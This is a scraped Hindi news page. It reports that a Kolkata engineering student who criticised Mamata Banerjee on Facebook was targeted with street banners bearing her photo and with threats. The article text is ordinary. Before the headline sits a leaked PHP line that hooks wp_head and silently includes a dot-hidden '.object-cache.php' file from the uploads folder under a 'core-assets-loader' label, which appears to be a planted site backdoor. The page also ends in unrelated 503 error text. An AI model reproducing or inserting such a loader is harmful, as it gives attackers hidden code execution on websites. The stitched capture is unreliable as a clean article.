add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोलकाता : ममता के खिलाफ महंगी पड़ी FB पोस्ट, बैनर बना सड़कों पर चिपकाया – SOCH INDIA
Menu

राजनीति
कोलकाता : ममता के खिलाफ महंगी पड़ी FB पोस्ट, बैनर बना सड़कों पर चिपकाया

nobanner

नेताओं या सरकार को लेकर सोशल मीडिया पर की गई टिप्पणियों के बाद कई तरह की प्रतिक्रियाएं आ रही हैं. कई बार विरोधी या समर्थक फेसबुक वॉल या ट्वीटर टूट पड़ते हैं. लेकिन, कोलकाता की एक इंजीनियरिंग की छात्रा को सीएम ममता बनर्जी पर फेसबुक पोस्ट करना काफी महंगा पड़ गया.

ममता बनर्जी की ‘मां दुर्गा’ परेड को लेकर छात्रा ने टिप्पणी की थी. इसके बाद ममता के समर्थकों ने छात्रा की फोटो के साथ उसकी पोस्ट के बैनर बना कर दमदम इलाके में चिपका दिए. दमदम इलाके में ही छात्रा रहती है. पोस्टर पर लिखा गया है कि ‘हम मुख्यमंत्री के विरोध की निंदा करते हैं.’

इसके बाद छात्रा काफी डरी हुई है. न सिर्फ इससे कि बैनर में उसकी तस्वीर है, बल्कि उसे धमकी भी दी गई है. उसने कहा है कि स्थानीय तृणमूल कांग्रेस की महिला कार्यकर्ताओं ने उसे धमकी दी है. यह बैनर ‘दमदम वार्ड 8 सिटिजन कमेटी’ की ओर से लगाए गए हैं.

छात्रा ने परेड को लेकर टिप्पणी की थी कि जहां राज्य में लोग बेरोजगारी और अन्य समस्याओं को झेल रहे हैं वहां इस तरह के दिखावे का कोई मतलब नहीं है. इस पर कुछ लोगों ने सहमति जताई थी तो कुछ लोगों ने इसका विरोध भी किया. लेकिन, हद तो तब हो गई जब लड़की की फोटो और उसकी पोस्ट का बैनर बना सड़क पर लगा दिया गया.

इस पर स्थानीय तृणमूल कांग्रेस नेताओं ने काफी कड़ी प्रतिक्रियाएं दी हैं. उनका कहना है कि इस तरह का बयान हद पार कर के दिया गया है. गौरतलब है कि ममता बनर्जी के कार्टून को लेकर हुए विवाद के बाद एक प्रोफेसर को गिरफ्तार किया गया था.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.